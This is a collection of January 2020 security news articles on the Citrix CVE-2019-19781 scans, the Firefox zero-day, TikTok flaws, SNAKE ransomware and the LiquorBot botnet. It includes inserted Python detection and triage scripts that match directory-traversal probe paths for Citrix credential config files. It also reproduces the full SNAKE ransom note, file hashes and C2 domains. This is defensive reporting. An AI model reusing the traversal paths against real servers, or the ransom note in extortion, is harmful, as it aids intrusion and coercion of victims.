"When the operation concluded in late November, the number of infected devices had been reduced by 78 percent," says INTERPOL. "Efforts to remove the infections from the remaining devices continue."

INTERPOL's Director of Cybercrime, Craig Jones (INTERPOL)
INTERPOL's press release adds that private sector partners including Trend Micro and Cyber Defense Institute supported Operation Goldfish Alpha by sharing information on cryptojacking cases.

The partners also provided security experts from participating countries with guidelines on how to patch infected routers, as well as recommendations on preventing future cryptojacking infections.

"When faced with emerging cybercrimes like cryptojacking, the importance of strong partnerships between police and the cybersecurity industry cannot be overstated," INTERPOL’s Director of Cybercrime Craig Jones said.

"By combining the expertise and data on cyberthreats held by the private sector with the investigative capabilities of law enforcement, we can best protect our communities from all forms of cybercrime."


Windows 10 Insider Build 19541 Warns If Apps Are Using Your Location
12.1.2020 
Bleepingcomputer  OS

Microsoft has released Windows 10 Insider Preview Build 19541 to Insiders in the Fast ring. The build lets you display the architecture of each process listed in Task Manager, and Windows will now notify you when an application is using location services.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19541 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19541

Microsoft also warned that they are investigating reports of build updates hanging for a long time. If this occurs while installing this build, just give it time to complete.

We’re looking into reports of the update process hanging for extended periods of time when attempting to install a new build.

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

Location services in-use indicator
Microsoft has updated the Notification area icon so that it now indicates when an application is using location services in Windows 10.

New Location in-use indicator
Process architecture is now shown in Task Manager
Similar to how third-party task managers work, like Process Explorer, you can now enable the task manager to display the architecture (x64 or x86) of the listed processes.


This feature is useful from a security perspective as it can be used to spot 32-bit malware impersonating Microsoft executables. For example, if svchost.exe is listed as an x86 process then you know it's malware as the legitimate version is x64 architecture.

General changes, improvements, and fixes for PC
• We fixed an issue that impacted System Settings reliability.
• We fixed an issue that could result in Windows Update "Reboot needed" notifications persisting after a reboot.
• We fixed an issue that could result in the update speed in Task Manager unexpectedly being set to Paused.
• We fixed an issue when using Narrator that could result in Start not saying the correct index of an app in the all apps list.
• We fixed an issue where the Search window wasn't showing acrylic at the top.
• We fixed an issue from the previous build resulting in the Feedback Hub unexpectedly not showing store apps in the list of contexts when logging feedback under the Apps category. This same issue resulted in the symptom of apps continuing to show Install in the Microsoft Store, rather than Launch, after the app had been installed.
Known issues
• BattlEye and Microsoft have found incompatibility issues due to changes in the operating system between some Insider Preview builds and certain versions of BattlEye anti-cheat software. To safeguard Insiders who might have these versions installed on their PC, we have applied a compatibility hold on these devices from being offered affected builds of Windows Insider Preview. See this article for details.
• We're looking into reports of the update process hanging for extended periods of time when attempting to install a new build.
• We're looking into reports of certain external USB 3.0 drives not responding with Start Code 10 after they're attached.
• The Optimize Drives Control Panel is incorrectly reporting that optimization has never run on some devices. Optimization is completing successfully, even though it is not reflected in the UI.
• The Documents section under Privacy has a broken icon (just a rectangle).
• Remote Desktop Connection crashes when attempting to connect to multiple sessions.
• Snipping isn't working on secondary monitors.
• Timeline isn't showing any activities.
• We're investigating reports that Outlook search isn't working for some Insiders.


Mozilla Firefox 72.0.1 Patches Actively Exploited Zero-Day
12.1.2020 
Bleepingcomputer  Exploit  Vulnerebility

Mozilla released Firefox 72.0.1 and Firefox ESR 68.4.1 to patch a critical severity vulnerability, actively exploited in the wild, that could allow attackers to execute code or trigger crashes on machines running vulnerable Firefox versions.

As Mozilla's security advisory says, the Firefox developers are "aware of targeted attacks in the wild abusing this flaw" which could make it possible for attackers who successfully exploit it to abuse affected systems.

The Firefox and Firefox ESR zero-day flaw fixed by Mozilla was reported by a research team from Qihoo 360 ATA.

BleepingComputer has reached out to the Qihoo 360 ATA researchers for additional details but had not heard back at the time of this publication.

Mozilla Firefox 72.0.1

The type confusion vulnerability tracked as CVE-2019-17026 impacts the web browser's IonMonkey Just-In-Time (JIT) compiler and it occurs when incorrect alias information is fed for setting array elements.

This type of security flaw can lead to out-of-bounds memory access in languages without memory safety which, in some circumstances, can lead to code execution or exploitable crashes.

Potential attackers could trigger the type confusion flaw by redirecting users of unpatched Firefox versions to maliciously crafted web pages.

CVE-2019-17026

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert saying that "an attacker could exploit this vulnerability to take control of an affected system," and advising users to review the Mozilla Security Advisory and apply the security update.

While there is no other info related to this 0-day flaw, all users should install the patched Firefox release by manually checking for the new update by going to the Firefox menu -> Help -> About Firefox.

You can also download the latest patched version for Windows, macOS, and Linux from the following links:

Firefox 72.0.1 for Windows 64-bit
Firefox 72.0.1 for Windows 32-bit
Firefox 72.0.1 for macOS
Firefox 72.0.1 for Linux 64-bit
Firefox 72.0.1 for Linux 32-bit
This security patch comes a day after Firefox 72.0 was released with fixes for another 11 security vulnerabilities, five of them classified as 'High', five as 'Medium', and one as 'Low'.

Of the five high severity vulnerabilities, four could potentially be used by attackers for arbitrary code execution after leading victims to specially crafted malicious pages.

In June 2019, Mozilla patched two other actively exploited zero-day vulnerabilities used in targeted attacks against cryptocurrency firms such as Coinbase.


Attackers Are Scanning for Vulnerable Citrix Servers, Secure Now
12.1.2020 
Bleepingcomputer  Vulnerebility

Security researchers have observed ongoing scans for Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) servers vulnerable to attacks exploiting CVE-2019-19781 during the last week.

This vulnerability impacts multiple Citrix products and it could potentially expose the networks of over 80,000 firms to hacking attacks according to a Positive Technologies report from December.

As the security outfit said at the time, "at least 80,000 companies in 158 countries are potentially at risk," with the top 5 countries being "the United States (the absolute leader, with over 38 percent of all vulnerable organizations), the UK, Germany, the Netherlands, and Australia."

"Depending on specific configuration, Citrix applications can be used for connecting to workstations and critical business systems (including ERP)," Positive Technologies added. "In almost every case, Citrix applications are accessible on the company network perimeter, and are therefore the first to be attacked."

No public exploits available
CVE-2019-19781 comes with a 9.8 Critical CVSS v3.1 base score and it could allow unauthenticated attackers to perform arbitrary code execution via Directory Traversal if successfully exploited.

However, as security researcher Kevin Beaumont, who shared the info on active CVE-2019-19781 scans on Twitter, said, currently no exploitation of this security issue has been observed and no information on an exploit is publicly available so far.

In my Citrix ADC honeypot, CVE-2019-19781 is being probed with attackers reading sensitive credential config files remotely using ../ directory traversal (a variant of this issue). So this is in the wild, active exploitation starting up. https://t.co/pDZ2lplSBj

— Kevin Beaumont (@GossiTheDog) January 8, 2020
SANS Technology Institute's Dean of Research Johannes B. Ullrich who monitored scans for vulnerable Citrix systems during the last week also confirmed that no active exploitation has been observed and no public exploits are yet available.

Despite this, he also added that credible sources "have indicated that they were able to create a code execution exploit."

According to Citrix, CVE-2019-19781 affects all supported product versions and platforms:

• Citrix ADC and Citrix Gateway version 13.0 all supported builds
• Citrix ADC and NetScaler Gateway version 12.1 all supported builds
• Citrix ADC and NetScaler Gateway version 12.0 all supported builds
• Citrix ADC and NetScaler Gateway version 11.1 all supported builds
• Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

Mitigation measures
While Citrix hasn't yet released a firmware patch to address this security flaw, the company did publish a set of mitigation measures for standalone systems and clusters, and it strongly recommends that all impacted customers apply them as soon as possible.

"Customers should then upgrade all of their vulnerable appliances to a fixed version of the appliance firmware when released," Citrix also says.

To be alerted when updated firmware will be available for impacted Citrix products, customers are also advised to subscribe to bulletin alerts here.

Nextron Systems' Florian Roth also provides a Sigma detection rule for SIEM systems that detects CVE-2019-19781 exploitation attempts against Citrix NetScaler, Application Delivery Controller, and Citrix Gateway.

The rule inspects the web request path and, if it contains '/../vpns/' or '/vpns/cfg/smb.conf', logs it as a critical alert.
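The same two-pattern check, run over constructed access-log lines, as an added example (not the article's text and not Florian Roth's Sigma rule itself). Percent-decoding and folding backslashes before matching are this example's own additions, so a URL-encoded '..' does not slip past a literal string check; the log lines and addresses are constructed.

```python
"""Detection logic for the two request-path patterns the article says the Sigma
rule checks for ('/../vpns/' and '/vpns/cfg/smb.conf'), run over constructed
access-log lines. Added example, not the article's text nor Florian Roth's rule."""
import re
from typing import List, Optional
from urllib.parse import unquote

SUSPICIOUS_PATTERNS = ("/../vpns/", "/vpns/cfg/smb.conf")

# Apache/nginx combined format: ip ident user [timestamp] "METHOD PATH PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def normalise_path(path: str) -> str:
    """Decode percent-encoding twice (catches double encoding) and fold '\\' to '/'.
    This normalisation is an addition beyond the rule as the article describes it."""
    return unquote(unquote(path)).replace("\\", "/")


def matches_citrix_probe(path: str) -> Optional[str]:
    """Return the pattern that matched the normalised path, or None if benign."""
    norm = normalise_path(path)
    for pattern in SUSPICIOUS_PATTERNS:
        if pattern in norm:
            return pattern
    return None


def scan_access_log(lines: List[str]) -> List[dict]:
    """Return one record per suspicious request. The status code is kept because a
    200 on a config-file read means the appliance actually served the file, which
    matters when deciding whether credentials stored on the box should be rotated."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skipped here; count or alert on these in production
        pattern = matches_citrix_probe(m["path"])
        if pattern:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "pattern": pattern})
    return hits


# Constructed sample lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jan/2020:10:21:03 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 412',
    '203.0.113.7 - - [08/Jan/2020:10:21:09 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 0',
    '198.51.100.23 - - [08/Jan/2020:10:22:44 +0000] "GET /vpn/index.html HTTP/1.1" 200 8812',
    '198.51.100.23 - - [08/Jan/2020:10:23:01 +0000] "POST /cgi/login HTTP/1.1" 302 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"CRITICAL {hit['ts']} {hit['ip']} {hit['path']} -> {hit['pattern']} (HTTP {hit['status']})")
```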

"Citrix applications are widely used in corporate networks. This includes their use for providing terminal access of employees to internal company applications from any device via the Internet," Positive Technologies's Director of Security Audit Department Dmitry Serebryannikov says.

"Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat."


TikTok Flaws Allowed Hackers to Delete Videos, Steal User Info
12.1.2020 
Bleepingcomputer  Vulnerebility

Security researchers found several vulnerabilities within TikTok’s infrastructure that made it possible for potential attackers to hijack accounts to manipulate users' videos and steal their personal information.

TikTok is a social media platform owned by Beijing-based ByteDance. The company has offices around the world and servers in the countries where its iOS and Android apps operate, and the platform is used for sharing short-form looping mobile videos of 3 to 60 seconds.

The platform's Android app currently has over 500,000,000 installs according to Google Play Store stats and has crossed the 1.5 billion installs mark on all mobile platforms during November 2019 according to Sensor Tower Store Intelligence estimates.

TikTok's applications and its backend were vulnerable to attacks as Check Point researchers state in a report shared with Bleeping Computer earlier this week.

The security issues were disclosed to ByteDance during late November, with the company fixing the vulnerabilities within one month.

"Data is pervasive but data breaches are becoming an epidemic, and our latest research shows that the most popular apps are still at risk," Check Point’s Head of Product Vulnerability Research Oded Vanunu said.

"Social media applications are highly targeted for vulnerabilities as they provide a good source for private data and offer a good attack surface gate."

TikTok's vulnerable SMS system
TikTok's SMS system allowed the Check Point research team to manipulate account data by adding and deleting videos, to demonstrate privacy encroachment issues by changing video privacy settings from private to public, and to exfiltrate personal user data including full name, email address, and birthday.

As shown by Check Point Research, attackers could have exploited these vulnerabilities via TikTok's SMS system to:

• Upload unauthorized videos and delete users' videos
• Move users' videos from private to public
• Steal sensitive personal data
To perform these malicious actions, hackers could send app download links to any user's phone number via text messages impersonating TikTok, which allowed them to inject and execute malicious code.

Additionally, using the same tactic, attackers could redirect TikTok users to a web server they controlled, making it possible for the hackers to send unwanted requests on behalf of their victims.

Potential attackers could have used "the same technique to redirect a victim to a malicious website under the guise of tiktok.com," Check Point Research also found.

"The redirection opens the possibility of accomplishing Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), and Sensitive Data Exposure attacks without user consent."

TikTok Security Team's Luke Deshotels said that "TikTok is committed to protecting user data. Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us.

Before public disclosure, CheckPoint agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers."

TikTok now banned on U.S. military phones
Check Point Research's disclosure comes right after U.S. military branches including the Army, Navy, Marine Corps, and Air Force banned the Chinese-owned TikTok app from soldiers' government-issued smartphones.

"It is considered a cyber threat," Army spokeswoman Lt. Col. Robin Ochoa said according to a Military.com report from December 30. "We do not allow it on government phones."

The new guidance advises all Defense Department employees to also "be wary of applications you download, monitor your phones for unusual and unsolicited texts etc., and delete them immediately and uninstall TikTok to circumvent any exposure of personal information."

The Army's decision followed a letter sent by U.S. Senators Chuck Schumer and Tom Cotton in October "to the Acting Director of National Intelligence requesting an assessment of the national security risks posed by TikTok and other China-based content platforms operating in the U.S."

Naval Network Warfare Command user awareness bulletin
Navy/Marine Corps Intranet (NMCI) user awareness bulletin banning TikTok
Schumer also published a statement after Reuters reported that the U.S. government started an investigation on TikTok-owner ByteDance’s acquisition of the U.S. social media app Musical.ly from November 2017 for potential national security risks.

In his statement, Schumer said that the national security probe into TikTok validates the senators' concern that "that apps like TikTok [..] may pose serious risks to millions of Americans and deserve greater scrutiny."

Vanessa Pappas, TikTok US' General Manager responded to these accusations via multiple posts on the company's newsroom saying that TikTok stores "all TikTok US user data in the United States, with backup redundancy in Singapore.

Our data centers are located entirely outside of China, and none of our data is subject to Chinese law," she said in late October.

One month later, Pappas reiterated that "TikTok’s data centers are located entirely outside of China." She also stated that the company has "a dedicated technical team focused on adhering to robust cybersecurity policies, and data privacy and security practices."


SNAKE Ransomware Is the Next Threat Targeting Business Networks
12.1.2020 
Bleepingcomputer  Ransomware

As if network administrators didn't already have enough on their plate, they now have to worry about a new ransomware called SNAKE that is targeting their networks and aiming to encrypt all of the devices connected to them.

Enterprise-targeting, or big-game hunting, ransomware is used by threat actors who infiltrate a business network, gather administrator credentials, and then use post-exploitation tools to encrypt the files on all of the computers on the network.

The list of enterprise-targeting ransomware is slowly growing and includes Ryuk, BitPaymer, DoppelPaymer, Sodinokibi, Maze, MegaCortex, LockerGoga, and now the Snake Ransomware.

What we know about the Snake Ransomware
Snake Ransomware was discovered by MalwareHunterTeam last week who shared it with Vitali Kremez to reverse engineer and learn more about the infection.

Based on the analysis performed by Kremez, this ransomware is written in Golang and contains a much higher level of obfuscation than is commonly seen with these types of infections.

"The ransomware contains a level of routine obfuscation not previously and typically seen coupled with the targeted approach," Kremez, Head of SentinelLabs, told BleepingComputer in a conversation.

When started, Snake will remove the computer's Shadow Volume Copies and then kill numerous processes related to SCADA systems, virtual machines, industrial control systems, remote management tools, network management software, and more.

It then proceeds to encrypt the files on the device, while skipping any that are located in Windows system folders and various system files. The list of system folders that are skipped can be found below:

windir
SystemDrive
:\$Recycle.Bin
:\ProgramData
:\Users\All Users
:\Program Files
:\Local Settings
:\Boot
:\System Volume Information
:\Recovery
\AppData\
When encrypting a file, it will append a random 5-character string to the file's extension. For example, a file named 1.doc will be encrypted and renamed to something like 1.docqkWbv.

Folder of Encrypted Files
In each file that is encrypted, the SNAKE Ransomware will append the 'EKANS' file marker shown below. EKANS is SNAKE in reverse.

EKANS File Marker
BleepingComputer has tested many ransomware infections since 2013 and, for some reason, it took Snake a particularly long time to encrypt our small test box compared to many other ransomware infections. As this is targeted ransomware that is executed at the time of the attacker's choosing, this may not be that much of a problem, as the encryption will most likely occur after hours.
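A triage helper for the rename pattern, EKANS marker and ransom-note name described above, added here as an example and not code from the article or from Kremez's analysis. It assumes the marker is the literal ASCII bytes EKANS at the very end of the file (the article says it is appended but shows the layout only in a screenshot), that the appended string is five ASCII letters or digits as in the 1.docqkWbv example, and it uses a constructed list of common extensions; the sample tree it builds is constructed, not real ransomware output.

```python
"""Triage helper for files renamed and marked the way the article describes
SNAKE/EKANS doing it. Added example; marker position and extension list are
assumptions noted in the comments."""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, Optional

MARKER = b"EKANS"                   # SNAKE reversed, as the article notes
RANSOM_NOTE = "Fix-Your-Files.txt"  # note name from the article

# Constructed list of extensions to recognise in renamed files (assumption, not from the article).
COMMON_EXTENSIONS = ("docx", "xlsx", "pptx", "doc", "xls", "ppt", "pdf",
                     "jpg", "png", "txt", "sql", "bak", "mdb")

# "<ext>" immediately followed by five alphanumerics at the end of the name, e.g. "1.docqkWbv".
RENAME_RE = re.compile(r"\.(" + "|".join(COMMON_EXTENSIONS) + r")([A-Za-z0-9]{5})$", re.IGNORECASE)


def has_ekans_marker(path: Path) -> bool:
    """True if the file ends with the EKANS marker (assumed position: last 5 bytes).
    Only the tail is read, so large files are cheap to check."""
    if path.stat().st_size < len(MARKER):
        return False
    with path.open("rb") as fh:
        fh.seek(-len(MARKER), os.SEEK_END)
        return fh.read(len(MARKER)) == MARKER


def probable_original_name(name: str) -> Optional[str]:
    """If the name looks like <original>.<ext><5 random chars>, return the probable
    original name; otherwise None. On its own this is a weak signal: a legitimate
    name such as 'image.document' also matches ('doc' + 'ument')."""
    m = RENAME_RE.search(name)
    return name[: m.start(2)] if m else None


def triage_tree(root: Path) -> Dict[str, list]:
    """Walk root and bucket files: 'encrypted' (marker present, with the probable
    original name), 'ransom_notes' (Fix-Your-Files.txt) and 'rename_only'
    (suspicious name but no marker; worth a look, not proof)."""
    result: Dict[str, list] = {"encrypted": [], "ransom_notes": [], "rename_only": []}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if p.name == RANSOM_NOTE:
            result["ransom_notes"].append(rel)
            continue
        original = probable_original_name(p.name)
        if has_ekans_marker(p):
            result["encrypted"].append((rel, original))
        elif original is not None:
            result["rename_only"].append(rel)
    return result


def build_demo_tree() -> Path:
    """Constructed sample tree standing in for a hit workstation (not real ransomware output)."""
    root = Path(tempfile.mkdtemp(prefix="snake_triage_"))
    docs = root / "docs"
    docs.mkdir()
    (docs / "report.docqkWbv").write_bytes(b"\x9f\x03\x44\x1a fake ciphertext " + MARKER)
    (docs / "photo.jpgAb12Z").write_bytes(b"\x11\x22\x33 fake ciphertext " + MARKER)
    (docs / "notes.txt").write_bytes(b"plain text, untouched")
    (docs / "image.document").write_bytes(b"looks renamed, but no marker and never encrypted")
    (root / RANSOM_NOTE).write_text("| What happened to your files?\n")
    return root


if __name__ == "__main__":
    for bucket, entries in triage_tree(build_demo_tree()).items():
        print(bucket, entries)
```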

When done encrypting the computer, the ransomware will create a ransom note in the C:\Users\Public\Desktop folder named Fix-Your-Files.txt. This ransom note contains instructions to contact a listed email address for payment instructions. This email address is currently bapcocrypt@ctemplar.com.

SNAKE Ransom Note
As you can see from the language in the ransom note, this ransomware specifically targets the entire network rather than individual workstations. They further indicate that any decryptor that is purchased will be for the network and not individual machines, but it is too soon to tell if they would make an exception.

This ransomware is still being analyzed for weaknesses and it is not known if it can be decrypted for free. At this time, though, it looks secure.

IOCs:
Hash:
e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60
Ransom note text:
--------------------------------------------

| What happened to your files?

--------------------------------------------

We breached your corporate network and encrypted the data on your computers. The encrypted data includes documents, databases, photos and more -

all were encrypted using a military grade encryption algorithms (AES-256 and RSA-2048). You cannot access those files right now. But dont worry!

You can still get those files back and be up and running again in no time.

---------------------------------------------

| How to contact us to get your files back?

---------------------------------------------

The only way to restore your files is by purchasing a decryption tool loaded with a private key we created specifically for your network.

Once run on an effected computer, the tool will decrypt all encrypted files - and you can resume day-to-day operations, preferably with

better cyber security in mind. If you are interested in purchasing the decryption tool contact us at bapcocrypt@ctemplar.com

-------------------------------------------------------

| How can you be certain we have the decryption tool?

-------------------------------------------------------

In your mail to us attach up to 3 files (up to 3MB, no databases or spreadsheets).

We will send them back to you decrypted.
Associated file names:
Fix-Your-Files.txt


Tails 4.2 Fixes Numerous Security Flaws, Improves Direct Upgrades
12.1.2020 
Bleepingcomputer  OS

The Tails Project released a new version of the security-focused Tails Linux distribution and advises users to upgrade as soon as possible to fix multiple security vulnerabilities impacting the previous Tails 4.1.1 version.

Tails (short for The Amnesic Incognito Live System) is a Linux distro focused on guarding its users' anonymity and helping them circumvent censorship by forcing all Internet connections through the Tor network.

The new Tails 4.2 version also comes with important improvements to its automatic upgrade feature, new command-line tools for SecureDrop users "to analyze the metadata of leaked documents on computers that cannot use the Additional Software feature", and some additional updates.

Patched security vulnerabilities
Tails 4.2 fixes a long list of security issues affecting multiple components and all users are recommended to upgrade to this new release as soon as possible.

The security vulnerabilities patched in today's release are linked below:

• Tor Browser: Mozilla Foundation Security Advisory 2020-02
• Thunderbird: No MFSA published.
• Linux: CVE-2019-19602, CVE-2019-18811, CVE-2019-18660, CVE-2019-15291, CVE-2019-18683, CVE-2019-15099, CVE-2019-19524, CVE-2019-19051, CVE-2019-19047, CVE-2019-19045, CVE-2019-19534, CVE-2019-19529, CVE-2019-19052
• Cyrus SASL: Debian Security Advisory 4591
• Python ECDSA: Debian Security Advisory 4588
Automatic upgrades to Tails 4.2 are available from the 4.0, 4.1, and 4.1.1 versions, but you should manually upgrade using the following guides "if you cannot do an automatic upgrade or if the system fails to start afterward."

To manually upgrade you can use these guides, provided by the Tails team:

• Windows: https://tails.boum.org/upgrade/win-overview/
• macOS: https://tails.boum.org/upgrade/mac-overview/
• Linux: https://tails.boum.org/upgrade/linux-overview/
Automatic upgrades improvements
The Tails Project enhanced the automatic upgrade feature with the release of Tails 4.2. From now on, you can upgrade from all previous versions to the latest version.

"Until now, if your version of Tails was several months old, you sometimes had to do 2 or more automatic upgrades in a row," the dev team says. "For example, to upgrade from Tails 3.12 to Tails 3.16, you first had to upgrade to Tails 3.14."

In addition, manual upgrades will only be needed between major Tails versions, as will be the case when upgrading to Tails 5.0 after its release next year.

"Until now, you could only do a limited number of automatic upgrades, after which you had to do a much more complicated 'manual' upgrade," the developers add.

As a bonus, automatic upgrades now also use less memory and the download sizes have been optimized to make it faster to get updates.

Tails 4.2 also updates the Tor Browser to 9.0.3, the Thunderbird email client to 68.3.0, and the Linux kernel to the 5.3.15 version released on December 5, 2019.

According to the development team, the Tails 4.3 version is scheduled for release on February 11 and it should be a bugfix release.


Microsoft Releases January 2020 Office Updates With Crash Fixes
12.1.2020 
Bleepingcomputer  OS  Vulnerebility

Microsoft released the January 2020 non-security Microsoft Office updates that come with crash and memory leak fixes, as well as performance and stability improvements for Windows Installer (MSI) editions of Office 2016.

For instance, 2020's first series of Microsoft Office non-security updates fix an issue where Microsoft Visio would crash when opening .vsdx files from Microsoft SharePoint, OneDrive, or a web location if the resource's URL contains an ampersand (&) character.

Once you install the Visio 2016 KB4484170 update, you will be able to load any URL again without the app crashing unexpectedly.

This month's KB4484212 update also patches a memory leak affecting Outlook 2016 when toast notifications are enabled.

December 2019 Office non-security updates
The updates released today by Microsoft can be downloaded via the Microsoft Update service or from the Download Center for manual installation.

None of the Microsoft Office updates issued today apply to Office subscription or Office 2016 Click-to-Run editions such as Microsoft Office 365 Home.

The list of updates and the Office product they apply to is available below.

Product Knowledge Base article
Microsoft Office 2016 KB4464586
Microsoft Office 2016 KB4484168
Microsoft Office 2016 KB4484218
Microsoft Outlook 2016 KB4484212
Microsoft PowerPoint 2016 KB4484216
Microsoft Project 2016 KB4484140
Microsoft Visio 2016 KB4464575
Microsoft Visio Viewer 2016 KB2920709
Microsoft Word 2016 KB4484219
Skype for Business 2016 KB4484213
Some updates may require a restart
Before installing the January 2020 non-security Microsoft Office updates, it is important to mention that you may also be required to restart your computer to complete the installation process.

If your Office installation starts misbehaving, you can uninstall the offending update following this step by step procedure:

Go to Start, enter View Installed Updates in the Search Windows box, and then press Enter.
In the list of updates, locate and select the offending update, and then select Uninstall.
Depending on the update, you might also have to install another update for the issue to be fully addressed or the improvement to be enabled on your Windows device, as is the case of the KB4484168 update that requires KB4484216 to also be installed.


Medical Info of Roughly 50K Exposed in Minnesota Hospital Breach
12.1.2020 
Bleepingcomputer  Incindent

The personal and medical information of 49,351 patients was exposed following a security incident involving two employees' email accounts as disclosed by Minnesota-based Alomere Health.

Alomere Health is a community-owned and non-profit general medical and surgical hospital with 127 beds that has twice been named one of the Top 100 Hospitals by Thomson Reuters.

The Alexandria, Minnesota-based locally-governed hospital started notifying its patients of the security breach incident on January 3, 2020.

Email accounts breached
The security breach was discovered on November 6, 2019, when the hospital staff found that an employee's email account was accessed by at least one unauthorized third party between October 31 and November 1, 2019.

After securing the breached account and starting an investigation with the help of a forensic security outfit, Alomere Health found on November 10 that a second employee's email was breached on November 6.

"The investigation was unable to determine whether the unauthorized person(s) actually viewed any email or attachment in either account," the hospital's breach notification says.

In an abundance of caution, we reviewed the emails and attachments in the accounts to identify patients whose information may have been accessible to the unauthorized person(s). From this review, we determined that portions of some patients’ information were contained in the email accounts. - Alomere Health

Medical and personal information exposed
After reviewing the emails contained within the two breached accounts, the staff discovered that the attackers might have gained access to patients’ names, addresses, dates of birth, as well as medical info such as record numbers, health insurance information, treatment information, and/or diagnosis information.

In addition, for a limited number of patients, Social Security numbers and driver's license numbers might have also been exposed.

Alomere Health offers complimentary credit monitoring and identity protection services for patients whose SSNs and driver license info was stored in the breached email accounts.

The Minnesota-based hospital advises customers who received an email notification regarding this security incident to "review any statements they receive from their health insurers or healthcare providers" and contact them immediately if they discover anything out of place like services that they did not receive being billed.

To lessen the likelihood this occurs in the future, we have put in place additional security measures for all of Alomere Health employee email accounts. It is through these additional layers of security, staff training, and diligence that we will continue to provide high-quality health care, close to home with safety and security. - Alomere Health

Alomere Health is now on a long list of healthcare providers impacted by breaches during the last month, with the Colorado Department of Human Services, Sinai Health System, Cheyenne Regional Medical Center, Children's Hope Alliance, and RiverKids Pediatric Home Health being just a handful of the total number.

The protected health information (PHI) of tens of thousands of patients was exposed just in these five incidents per data breach reports filed with the U.S. Department of Health and Human Services Office for Civil Rights within the last month.

Bleeping Computer has reached out to Alomere Health for additional info but had not heard back at the time of this publication.


Go-Based LiquorBot Adapts Cryptomining Payload to Infected Host
12.1.2020 
Bleepingcomputer  Cryptocurrency

A cryptomining botnet has been attacking unpatched routers since at least May 2019. It exploits a small set of critical vulnerabilities and targets multiple CPU architectures.

Named LiquorBot, the malware is written in Golang (Go), a programming language that has a syntax similar to C but offers some advantages, such as memory safety and garbage collection.

12+ versions in less than a year
Researchers at Bitdefender first saw LiquorBot on May 31, 2019, and tracked its evolution to a version discovered on October 10. Between these dates, 11 releases were identified:

SHA1 Package path First seen
2901d4ee7f289bf0b1a863bec716d751f66a4324 /home/woot/webliquor/ May 31st 2019
1bee367d72c472e5991435479cfdecdf3b6e65db /home/woot/webliquor/ June 4th 2019
2d1d294aac29fab2041949d4cb5c58d3169a31d3 /home/woot/webliquor/ June 7th 2019
b9dd4d230d103b3db458d752d4917466ec1cb9b0 /home/woot/webliquor/ June 10th 2019
31176239ab5187af5d89666f37038340b95a5a4e /home/woot/webliquor/ June 14th 2019
c6d850e264d7d8d6978cd85d69c22b29378e34e4 /home/woot/webliquor/ June 26th 2019
c59dd90f7cefadaa80d9c0113f8af39e4ed0c1a1 /home/woot/liquorv3/ July 24th 2019
8df16857cb914f5eded0249cfde07f1c01697db1 /home/woot/Desktop/GoNet/ Aug 8th 2019
8364c272e0c95ed214c71dbcb48f89c468544bc8 /home/woot/Desktop/ExNet/ Sep 11th 2019
bb07341ab6b203687845ae38cd8c17dfc947e79f /home/woot/Desktop/MineGO/ Sep 13th 2019
331ec23c250b86d912fa34e0e700bfcac1a7c388 /home/woot/Desktop/MineGO/ Sep 30th 2019
63b556a0afcf643337310254cc7f57c729188f36 /home/woot/Desktop/MineGO/ Oct 1st 2019
5821ff8eb9b23035a520e1fb836e43b1ec87ffaf /home/woot/Desktop/MineGO/ Oct 10th 2019
At its core, LiquorBot is a re-implementation of the infamous Mirai but with a cryptocurrency mining feature instead of a distributed denial-of-service (DDoS) component.

It is cross-compiled for ARM, ARM64, x86, x64, and MIPS architectures and the dropper script downloads all the payloads regardless of the CPU architecture.

LiquorBot dropper code
LiquorBot has multiple command and control (C2) servers and communicates with them periodically, reporting vulnerable devices and getting commands:

wpceservice.hldns.ru
ardp.hldns.ru
bpsuck.hldns.ru
Each of the above servers is used interchangeably as a C2 server, for Monero cryptocurrency mining, and for hosting the binaries.

Old bugs and brute-forcing
As for the targets, Bitdefender found that the malware seeks devices vulnerable to CVE-2015-2051, CVE-2016-1555, and CVE-2016-6277. It also uses some command injection (1, 2) and remote command execution flaws in several router models (D-Link, Netgear, and Linksys).

Exploiting these vulnerabilities is not the main compromise method as the malware relies primarily on SSH brute-force attacks that use a dictionary with 82 username/password combinations.

While this method is seen in most versions of LiquorBot, a release from July 24 adds the vulnerability exploits to increase its reach.

It is worth noting that although the malware releases have versions, they do not indicate the evolution of the botnet. The cryptocurrency component was introduced in version 0.2, released in October, while the version from July that adds new propagation methods was labeled 0.6.

LiquorBot is under active development and the authors are likely to further refine it in 2020. Updating your router, if possible, is the easiest way to defend against this sort of threat.

If a router is no longer supported, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) recommends that users and administrators replace it with an alternative that is still maintained by the vendor.


Microsoft Phishing Scam Exploits Iran Cyberattack Scare
10.1.2020 
Bleepingcomputer  Phishing

An attacker is attempting to take advantage of the recent warnings about possible Iranian cyberattacks by using them as the theme for a phishing attack that tries to collect Microsoft login credentials.

